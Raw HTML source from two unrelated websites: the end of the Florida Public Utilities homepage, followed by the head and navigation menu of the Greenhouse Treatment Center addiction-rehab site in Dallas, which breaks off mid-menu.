ubermenu-item-object-page ubermenu-item-5954 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/hurricanesafety/"><span class="ubermenu-target-title ubermenu-target-text">Hurricane Safety</span></a></li><li id="menu-item-5955" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5955 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/safety/safety-basics/"><span class="ubermenu-target-title ubermenu-target-text">Safety Basics</span></a></li><li id="menu-item-5958" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5958 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/safety/811-before-you-dig/"><span class="ubermenu-target-title ubermenu-target-text">811 Before You Dig</span></a></li><li id="menu-item-5957" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5957 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/safety/emergency-response/"><span class="ubermenu-target-title ubermenu-target-text">Emergency Response</span></a></li><li id="menu-item-8270" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-8270 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.ask4gas.com/safetysurvey/"><span class="ubermenu-target-title ubermenu-target-text">Gas Safety Survey</span></a></li><li id="menu-item-8271" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-8271 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-3 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/naturalgas/safety/training/"><span class="ubermenu-target-title ubermenu-target-text">Gas Safety Training</span></a></li></ul></li><li id="menu-item-5963" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5963 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/incentives/"><span class="ubermenu-target-title ubermenu-target-text">Propane Incentives</span></a></li><li id="menu-item-5961" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5961 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/energy-saving-tools/"><span class="ubermenu-target-title ubermenu-target-text">Energy-Saving Tools</span></a></li></ul></li><li id="menu-item-5964" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-5964 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-1-auto ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/customer-service/"><span class="ubermenu-target-title ubermenu-target-text">Propane Customer Service</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-5964 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-5969" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5969 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/customer-service/contact-information/"><span class="ubermenu-target-title ubermenu-target-text">Contact Information</span></a></li><li id="menu-item-5973" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5973 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/customer-service/areas-we-serve/"><span class="ubermenu-target-title ubermenu-target-text">Service Area</span></a></li><li id="menu-item-5974" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5974 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/customer-service/establishing-service/"><span class="ubermenu-target-title ubermenu-target-text">Service Requests / Inquiries</span></a></li><li id="menu-item-5976" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5976 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/customer-service/customer-welcome-book/"><span class="ubermenu-target-title ubermenu-target-text">Customer Welcome Book</span></a></li><li id="menu-item-5977" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-5977 ubermenu-item-header ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://fpuc.com/propane/programs-services/"><span class="ubermenu-target-title ubermenu-target-text">Services &#038; Programs</span></a></li></ul></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fa fa-times"></i> Close</li></ul></li></ul></div> <!-- End UberMenu --> </nav> <div class="headNav"> <div class="headRow" id="top"> <div class="emergencyBtn"><a href="/fpu-emergency-response/"><img src="/wp-content/themes/FPU/images/emergencyBtn.png" width="94" height="22" alt="24/7 Emergency Response " /></a> </div> <div class="searchBox"><form action="/" method="get" role="search"> <label class="searchTitle" for="search">Search:</label> <input class="searchInput" type="text" name="s" id="search" value="" /> <input class="searchBtn" type="image" alt="Submit Search" src="https://fpuc.com/wp-content/themes/FPU/images/searchIcon.png" /> </form></div> </div> <div class="headRow" id="bottom"> <nav class="corpMenu" aria-label="Helpful Links - Payments & Customer Service"> <div class="menu-corp-menu-container"><ul id="menu-corp-menu" class="menu"><li id="menu-item-3974" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3974"><a href="https://fpuc.com/payments/payment-methods-info/">Pay / Manage Account</a></li> <li id="menu-item-4456" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4456"><a href="https://fpuc.com/customer-service/contact-us/">Contact FPU</a></li> <li id="menu-item-172" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-172"><a href="https://fpuc.com/about/">About FPU</a></li> <li id="menu-item-171" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-171"><a href="https://fpuc.com/news-events/">News &#038; Events</a></li> <li id="menu-item-6331" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6331"><a target="_blank" rel="noopener noreferrer" href="http://www.chpk.com/our-culture/careers/">Careers</a></li> </ul></div> </nav> </div> </div> <a href="/" class="corpIcon" title="Link to Homepage">Florida Public Utilities</a> </div> </div> <div class="contentFrame"> <div class="content"> <div class="marqueeRow clearfix"> <div class="marqueeLeft"> <span style="display:none;">Home Slider</span><script type="text/javascript">var lsjQuery = jQuery;lsjQuery(document).ready(function() { if(typeof lsjQuery.fn.layerSlider == "undefined") { if( window._layerSlider && window._layerSlider.showNotice) { window._layerSlider.showNotice('layerslider_9','jquery'); } } else { lsjQuery("#layerslider_9").layerSlider({sliderVersion: '6.8.2', type: 'fixedsize', responsiveUnder: 0, layersContainer: 0, slideBGSize: 'auto', pauseOnHover: 1, skin: 'v5', globalBGColor: '#185382', globalBGSize: 'cover', skinsPath: 'https://fpuc.com/wp-content/plugins/LayerSlider/static/layerslider/skins/'}); } }); </script><div id="layerslider_9" class="ls-wp-container fitvidsignore" style="width:700px;height:300px;margin:0 auto;margin-bottom: 0px;"><div class="ls-slide" data-ls="duration:6000;kenburnsscale:1.2;"><img width="705" height="300" src="https://fpuc.com/wp-content/uploads/chipola-header.jpg" class="ls-bg" alt="" srcset="https://fpuc.com/wp-content/uploads/chipola-header.jpg 705w, https://fpuc.com/wp-content/uploads/chipola-header-300x128.jpg 300w" sizes="(max-width: 705px) 100vw, 705px" /><img width="705" height="300" src="https://fpuc.com/wp-content/uploads/chipola-header.jpg" class="ls-tn" alt="" srcset="https://fpuc.com/wp-content/uploads/chipola-header.jpg 705w, https://fpuc.com/wp-content/uploads/chipola-header-300x128.jpg 300w" sizes="(max-width: 705px) 100vw, 705px" /><a href="http://www.fpuc.com/chipola/" target="_self" class="ls-link ls-link-on-top"></a></div><div class="ls-slide" data-ls="duration:6000;kenburnsscale:1.2;"><img width="705" height="300" src="https://fpuc.com/wp-content/uploads/home-slider-central-gasCustomers.jpg" class="ls-bg" alt="" srcset="https://fpuc.com/wp-content/uploads/home-slider-central-gasCustomers.jpg 705w, https://fpuc.com/wp-content/uploads/home-slider-central-gasCustomers-300x128.jpg 300w" sizes="(max-width: 705px) 100vw, 705px" /><img width="705" height="300" src="https://fpuc.com/wp-content/uploads/home-slider-central-gasCustomers.jpg" class="ls-tn" alt="" srcset="https://fpuc.com/wp-content/uploads/home-slider-central-gasCustomers.jpg 705w, https://fpuc.com/wp-content/uploads/home-slider-central-gasCustomers-300x128.jpg 300w" sizes="(max-width: 705px) 100vw, 705px" /><a href="http://connect.fpuc.com/central-gas-company-of-okeechobee" target="_self" class="ls-link ls-link-on-top"></a></div><div class="ls-slide" data-ls="duration:6000;kenburnsscale:1.2;"><img width="705" height="300" src="https://fpuc.com/wp-content/uploads/home-slider-multi-fam2.jpg" class="ls-bg" alt="" srcset="https://fpuc.com/wp-content/uploads/home-slider-multi-fam2.jpg 705w, https://fpuc.com/wp-content/uploads/home-slider-multi-fam2-300x128.jpg 300w" sizes="(max-width: 705px) 100vw, 705px" /><img width="705" height="300" src="https://fpuc.com/wp-content/uploads/home-slider-multi-fam2.jpg" class="ls-tn" alt="" srcset="https://fpuc.com/wp-content/uploads/home-slider-multi-fam2.jpg 705w, https://fpuc.com/wp-content/uploads/home-slider-multi-fam2-300x128.jpg 300w" sizes="(max-width: 705px) 100vw, 705px" /><a href="http://ask4gas.com/multifamily/" target="_self" class="ls-link ls-link-on-top"></a></div><div class="ls-slide" data-ls="duration:6000;kenburnsscale:1.2;"><img width="700" height="305" src="https://fpuc.com/wp-content/uploads/ScamSlider.jpg" class="ls-bg" alt="How to Spot a Scam - Learn more at fpuc.com/scamalert" srcset="https://fpuc.com/wp-content/uploads/ScamSlider.jpg 700w, https://fpuc.com/wp-content/uploads/ScamSlider-300x131.jpg 300w" sizes="(max-width: 700px) 100vw, 700px" /><a href="http://www.fpuc.com/scamalert" target="_self" class="ls-link ls-link-on-top"></a></div></div> <div class="textwidget"><p><a href="https://fpuc.com/hurricanesafety/"><img src="https://fpuc.com/wp-content/uploads/19-086-FPU-M-Hurricane-Safety-Preparedness-Banner.png" alt="For Hurricane Safety Tips - Click Here »" width="700" height="80"/></a></p> </div> <div class="smBanners"><div id="classictextwidget-2" class="widget classic-textwidget custom-classic-textwidget"><span style="display:none;">FPUC Home &#8211; Small Banners</span> <div class="classic-text-widget"><a href="/customer-service/areas-we-serve/"><strong>Areas We Serve</strong>Natural Gas, Propane, and Electric Services Throughout Florida.<img src="/wp-content/uploads/bannerIcon_FL.png" alt="Areas We Serve" /></a> <a href="/naturalgas/residential/benefits/"><strong>Benefits of Using Natural Gas</strong>All you need to know about Energy Efficient Natural Gas.<img src="/wp-content/uploads/bannerIcon_flame.png" alt="Benefits of Natural Gas" /></a> <a href="/Freecheckup"><strong>Free Home Energy <br>Check-Up</strong>Lower Your Bills and Save Energy with Our Experts Help.<img src="/wp-content/uploads/bannerIcon_check.png" alt="Free Energy Check-Up" /></a></div> </div></div> </div> <div class="marqueeRight"> <span style="display:none;">Account Panel &#8211; All Fuels</span> <div class="textwidget"><div class="accountPanel"> <a href="/payments/payment-methods-info/"><h2 class="panelTitle">Account Center</h2></a> <div class="accountLinks"> <a href="https://secure3.i-doxs.net/florida/" target="_blank" class="btn mainLink" onClick="_gaq.push(['_trackEvent', 'Click', 'External Link', 'Online Bill Manager']);" rel="noopener noreferrer">Log In to Online Bill Manager »</a> <a href="https://secure3.i-doxs.net/florida/enroll.asp" target="_blank" class="btn smLink" onClick="_gaq.push(['_trackEvent', 'Click', 'External Link', 'Enroll in Bill Manager']);" rel="noopener noreferrer">Sign Up »</a> <a href="/payments/payment-methods-info/online-billing-faq/" class="btn smLink">Learn More »</a> <a href="/payments/payment-methods-info/#options" >Other Payment Options »</a> </div> </div></div> <span style="display:none;">Electric Rate Increase</span> <div class="classic-text-widget"><a class="callout" href="http://connect.fpuc.com/stormrecovery2019" target="_blank"><strong>Important Electric Rate Information </strong><br>Effective April 2019</a></div> <span style="display:none;">Contact Info &#8211; All Fuels</span> <div class="textwidget"><div class="csInfo"> <div class="mainInfo"> <h3 class="panelTitle">NEED ASSISTANCE</h3> <span class="subHead">Natural Gas or Electric</span> <p class="phone"> 800.427.7712 </p> </div> <a href="/customer-service/contact-us/#propane" class="propaneLink"> Propane Customers: <br>Find Contact Information</a> </div></div> <span style="display:none;">FPU Social Media Links</span> <div class="textwidget"><div class="socialIcons"> <span class="socialTitle">STAY INFORMED</span> <a href="http://www.facebook.com/pages/Florida-Public-Utilities/138019712920948" target="_blank" rel="noopener noreferrer"><img src="/wp-content/themes/FPU/images/fbIcon.png" alt="Florida Public Utilities on Facebook"/></a> <a href="http://twitter.com/#!/FPUCFL" target="_blank" rel="noopener noreferrer"><img src="/wp-content/themes/FPU/images/twitterIcon.png" alt="Florida Public Utilities on Twitter" /></a> <a href="http://blog.fpuc.com/blog" target="_blank" rel="noopener noreferrer"><img src="/wp-content/themes/FPU/images/blogIcon.png" alt="Florida Public Utilities Blog" /></a> <a href="http://www.Instagram.com/FPUC_EnergyExpert" target="_blank" rel="noopener noreferrer"><img src="/wp-content/themes/FPU/images/instagramIcon.png" alt="Florida Public Utilities on Instagram"/></a> <a href="http://www.Youtube.com/FLPublicUtility" target="_blank" rel="noopener noreferrer"><img src="/wp-content/themes/FPU/images/youtubeIcon.png" alt="Florida Public Utilities on YouTube"/></a> </div></div> </div> </div> <!-- Start the Loop. --> <!-- Display the Post's Content in a div box. --> <div class="entry clearfix" id="maincontent"> <div class="homeRow homeIntro" id="intro"> <div class="col-welcome homeCol"> <h1><strong>Welcome</strong> to Florida Public Utilities,<br />Your Energy Experts.</h1> </div> <div class="col-intro homeCol"> <p>Florida Public Utilities (FPU) provides natural gas, propane and electric service to homes and businesses throughout Florida. As your local, trusted energy provider, FPU is committed to helping you conserve energy, save money and enjoy the highest level of comfort—no matter what’s in your energy mix.</p> <p>Use our website to view your bill, pay online, see our map of service territories—or to start, stop or transfer your FPU service. Plus, learn how to take advantage of rebates on natural gas appliances, electric energy-efficiency upgrades, and various other energy-saving incentives.</p> </div> <div class="col-logo homeCol"> <div class="callOut" style="margin-left:10px; border-top:0px; border:2px solid #46c3d2; padding:0px 0px; background-color:#FFF;"> <h4 style="font-size:1.2em; background-color:#46c3d2; color:#FFF; padding:3px 5px;">FPU Welcomes the <br />Newest Members of Their <br />Propane Family</h4> <p style="font-size:.9em; padding:0px 5px;"><strong>Chipola Propane:</strong> </br><a href="https://fpuc.com/chipola/" rel="noopener" target="_blank">click here</a> </p> <p style="font-size:.9em; padding:0px 5px;"><strong>Central Gas Company of Okeechobee:</strong> <a href="http://connect.fpuc.com/central-gas-company-of-okeechobee" rel="noopener" target="_blank">click here</a></p> </div> </div> </div> </div> <!-- closes the first div box --> <!-- Stop The Loop (but note the "else:" - see next line). --> </div> </div> <div class="footer"> <a href="/about/">About FPU</a>| <a href="/naturalgas/">Natural Gas</a>| <a href="/electric/">Electric</a>| <a href="/propane/">Propane</a>| <a href="/news-events/">News & Events</a>| <a href="/payments/">Payments</a>| <a href="http://www.chpk.com/accessibility/" target="_blank">Accessibility</a>| <a href="/customer-service/forms-feedback/">Forms</a>| <a href="http://www.fpuc.com/marketplace/" target="_blank">FPU Marketplace</a>| <a href="/tariffs/">Tariffs</a>| <a href="http://www.chpk.com/terms-conditions/" target="_blank">Terms of Use</a>| <a href="/customer-service/">Customer Service</a> <div style="width:700px; text-align:center; margin:10px auto;"> <p class="copyright" style="margin:0px auto;">Florida Public Utilities is a subsidiary of</p> <div class="chpkLogo" style="margin:5px auto; width:157px;"><a href="http://www.chpk.com" target="_blank"><img src="/wp-content/themes/FPU/images/chpkLogoSm.png" width="157" height="29" alt="Chesapeake Utilities" /></a></div> </div> </div> </div> <!-- </div> --> <script type='text/javascript' src='https://fpuc.com/wp-content/plugins/page-links-to/js/new-tab.min.js?ver=3.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var ubermenu_data = {"remove_conflicts":"on","reposition_on_load":"off","intent_delay":"400","intent_interval":"20","intent_threshold":"7","scrollto_offset":"50","scrollto_duration":"1000","responsive_breakpoint":"959","accessible":"on","retractor_display_strategy":"responsive","touch_off_close":"on","collapse_after_scroll":"on","v":"3.2.5","configurations":["main"],"ajax_url":"https:\/\/fpuc.com\/wp-admin\/admin-ajax.php","plugin_url":"https:\/\/fpuc.com\/wp-content\/plugins\/ubermenu\/"}; /* ]]> */ </script> <script type='text/javascript' src='https://fpuc.com/wp-content/plugins/ubermenu/assets/js/ubermenu.min.js?ver=3.2.5'></script> <script type='text/javascript' src='https://fpuc.com/wp-includes/js/wp-embed.min.js?ver=10bba9c227fd74fa75702352b3de483d'></script> <script> jQuery(function($){ $('.PayInfo') .click(function() { //alert($( this ).children( '.su-spoiler-title' ) .text()); var eventLabel = $( this ).children( '.su-spoiler-title' ) .text(); _gaq.push(['_trackEvent', 'View Info', 'Payments', eventLabel]); }); /*function scroll() { $('.textwidget').css('left', $('.scrollAlert').width()); $('.textwidget').animate({ left: '-='+($('.scrollAlert').width()+$('.textwidget').width()) }, 30000, function() { scroll(); }); } scroll();*/ }); // Javascript to enable link to tab var url = document.location.toString(); if (url.match('#')) { $('.nav-tabs a[href="#' + url.split('#')[1] + '"]').tab('show'); } // Change hash for page-reload $('.nav-tabs a').on('shown.bs.tab', function (e) { window.location.hash = e.target.hash; }) </script> <a href="/emailus/" class="feedback-btn" title="Submit Feedback to FPU">Feedback</a> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="utf-8"> <!-- Media queries --> <meta name="viewport" content="width=device-width, initial-scale=1, minimal-ui"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <meta name="format-detection" content="telephone=no"> <!-- FAVICON --> <link rel="apple-touch-icon" sizes="180x180" href="https://www.greenhousetreatment.com/wp-content/themes/greenhouse-bigdrop/slice/favicon/apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="https://www.greenhousetreatment.com/wp-content/themes/greenhouse-bigdrop/slice/favicon/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="https://www.greenhousetreatment.com/wp-content/themes/greenhouse-bigdrop/slice/favicon/favicon-16x16.png"> <link rel="manifest" href="https://www.greenhousetreatment.com/wp-content/themes/greenhouse-bigdrop/slice/favicon/site.webmanifest"> <link rel="mask-icon" href="https://www.greenhousetreatment.com/wp-content/themes/greenhouse-bigdrop/slice/favicon/safari-pinned-tab.svg" color="#5bbad5"> <link rel="shortcut icon" href="https://www.greenhousetreatment.com/wp-content/themes/greenhouse-bigdrop/slice/favicon/favicon.ico"> <meta name="msapplication-TileColor" content="#ffc40d"> <meta name="msapplication-config" content="https://www.greenhousetreatment.com/wp-content/themes/greenhouse-bigdrop/slice/favicon/browserconfig.xml"> <meta name="theme-color" content="#ffffff"> <!-- FONTS --> <link href="https://fonts.googleapis.com/css?family=Montserrat:600%7COpen+Sans:400,400i,600" rel="stylesheet"> <!-- CSS LINKS --> <title>Greenhouse | Drug &amp; Alcohol Rehab Center Dallas TX</title> <!-- This site is optimized with the Yoast SEO plugin v9.4 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Quality, effective state of the art addiction and drug rehab treatment center located in the Dallas, Texas area. Call now."/> <link rel="canonical" href="https://www.greenhousetreatment.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Greenhouse | Drug &amp; Alcohol Rehab Center Dallas TX" /> <meta property="og:description" content="Quality, effective state of the art addiction and drug rehab treatment center located in the Dallas, Texas area. Call now." /> <meta property="og:url" content="https://www.greenhousetreatment.com/" /> <meta property="og:site_name" content="Greenhouse Treatment Center" /> <meta property="og:image" content="https://www.greenhousetreatment.com/wp-content/uploads/2019/01/1-Front-Sign-e1546960948485.jpg" /> <meta property="og:image:secure_url" content="https://www.greenhousetreatment.com/wp-content/uploads/2019/01/1-Front-Sign-e1546960948485.jpg" /> <meta property="og:image:width" content="900" /> <meta property="og:image:height" content="600" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Quality, effective state of the art addiction and drug rehab treatment center located in the Dallas, Texas area. Call now." /> <meta name="twitter:title" content="Greenhouse | Drug &amp; Alcohol Rehab Center Dallas TX" /> <meta name="twitter:site" content="@GreenhouseAAC" /> <meta name="twitter:image" content="https://www.greenhousetreatment.com//wp-content/uploads/2015/05/greenhouse-logo.png" /> <meta name="twitter:creator" content="@GreenhouseAAC" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.greenhousetreatment.com/#website","url":"https://www.greenhousetreatment.com/","name":"Greenhouse Treatment Center","potentialAction":{"@type":"SearchAction","target":"https://www.greenhousetreatment.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://www.greenhousetreatment.com/","sameAs":["https://www.facebook.com/GreenhouseTX/","https://www.linkedin.com/company/american-addiction-centers/","https://twitter.com/GreenhouseAAC"],"@id":"https://www.greenhousetreatment.com/#organization","name":"Greenhouse Treatment Center","logo":"https://www.greenhousetreatment.com/wp-content/uploads/2015/05/greenhouse-logo.png"}</script> <meta name="google-site-verification" content="-8p84I6x8VekDJVb15w_WS5nGTHKMZA4fPfbxFA2IbY" /> <meta name="p:domain_verify" content="ef5cc0ba4589760353c09b5bf306d027" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//cdn.jsdelivr.net' /> <link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /> <link rel='dns-prefetch' href='//www.greenhousetreatment.com' /> <link rel='stylesheet' id='global-css-css' href='https://www.greenhousetreatment.com/wp-content/themes/greenhouse-bigdrop/slice/dist/css/style.min.css?ver=1557525542' type='text/css' media='all' /> <script type='text/javascript' src='//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js?ver=4.9.1'></script> <script type='text/javascript' src='https://www.greenhousetreatment.com/wp-content/plugins/aacattribution/dist/attrlib.min.js?ver=1557525542'></script> <script type='text/javascript' src='//cdn.jsdelivr.net/fingerprintjs2/1.1.4/fingerprint2.min.js?ver=1.1.4'></script> <script type='text/javascript' src='https://www.greenhousetreatment.com/wp-content/themes/greenhouse-bigdrop/inc/js/jquery.prettySocial.min.js?ver=1557525542'></script> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//www.greenhousetreatment.com/?wordfence_lh=1&hid=880B43AC4B5FE0FC3699D70B50317E33'); </script> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-PTKDVH');</script> <!-- End Google Tag Manager --> <script src="https://cdn.optimizely.com/js/10194484313.js"></script> </head> <body class=""> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PTKDVH" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <!-- header --> <header class="header"> <div class="header-top"> <div class="header-phone"> <p>Call us today</p> <a href="tel:9728480221">(972) 848-0221</a> </div> <ul class="header-top-nav"><li id="menu-item-13761" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13761"><a href="https://www.greenhousetreatment.com/blog/">Blog</a></li> </ul> </div> <div class="header-bottom"> <a href="https://www.greenhousetreatment.com" class="header-logo"> <img src="https://www.greenhousetreatment.com/wp-content/uploads/s3:/greenhousetreatment-com-new/uploads/2018/12/Greenhouse_color-horiz.svg" alt="Greenhouse Treatment Center"> </a> <a href="#" class="button open-nav"><span>Menu <i></i></span><span>close</span></a> <div class="wrap-nav"> <div class="wrap-nav-inner"> <!-- nav --> <nav class="nav" role="navigation"> <ul class="nav-list"><li class=" menu-item menu-item-type-post_type menu-item-object-page"><div class="nav-item"><a href="https://www.greenhousetreatment.com/addiction-recovery-program-overview/">Program</a></div></li><li class=" menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children"><div class="nav-item"><a href="https://www.greenhousetreatment.com/addiction-treatment-services-dallas/">Services</a><i class="arrow"></i></div> <div class="sub-menu"> <div class="sub-menu-inner"> <div> <ul class="tabs-menu-list"><li class=" menu-item menu-item-type-post_type menu-item-object-page"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/addiction-treatment-services-dallas/levels-of-care/">Levels of Care</a></div></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/addiction-treatment-services-dallas/therapy-types/">Therapy Types</a></div></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/outpatient/aftercare/">Aftercare & Alumni</a></div></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/outpatient/">Outpatient</a></div></li></ul> </div> </div> </div> </li><li class=" menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children"><div class="nav-item"><a href="https://www.greenhousetreatment.com/dallas-addiction-treatment-facility/">Our Facility</a><i class="arrow"></i></div> <div class="sub-menu"> <div class="sub-menu-inner"> <div> <ul class="tabs-menu-list"><li class=" menu-item menu-item-type-post_type menu-item-object-page"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/dallas-addiction-treatment-facility/features-amenities/">Features & Amenities</a></div></li></ul> </div> </div> </div> </li><li class=" menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children"><div class="nav-item"><a href="https://www.greenhousetreatment.com/admissions/">Admissions</a><i class="arrow"></i></div> <div class="sub-menu"> <div class="sub-menu-inner"> <div> <ul class="tabs-menu-list"><li class=" menu-item menu-item-type-post_type menu-item-object-page"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/admissions/what-to-expect/">What To Expect</a></div></li></ul> </div> </div> </div> </li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><div class="nav-item"><a href="https://www.greenhousetreatment.com/addiction-treatment-payment-options/">Payment Options</a></div></li><li class=" menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children"><div class="nav-item"><a href="https://www.greenhousetreatment.com/about-our-addiction-treatment-center/">About Us</a><i class="arrow"></i></div> <div class="sub-menu"> <div class="sub-menu-inner"> <div> <ul class="tabs-menu-list"><li class=" menu-item menu-item-type-post_type menu-item-object-page"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/about-our-addiction-treatment-center/events-media/">Events &#038; Media</a></div></li></ul> </div> </div> </div> </li><li class="desktop-hidden menu-item menu-item-type-post_type menu-item-object-page"><div class="nav-item"><a href="https://www.greenhousetreatment.com/blog/">Blog</a></div></li><li class="sub-menu-list menu-item-type-post_type menu-item-object-page menu-item-has-children"><div class="nav-item"><a href="https://www.greenhousetreatment.com/resource-center/">Resources</a><i class="arrow"></i></div> <div class="sub-menu"> <div class="sub-menu-inner"> <div> <ul class="sub-menu-list"><li class=" menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/alcohol-treatment/">Alcohol Treatment Guide</a><i class="arrow"></i></div> <div class="sub-menu-lvl2"> <ul> <li class=" menu-item menu-item-type-post_type menu-item-object-page"><a 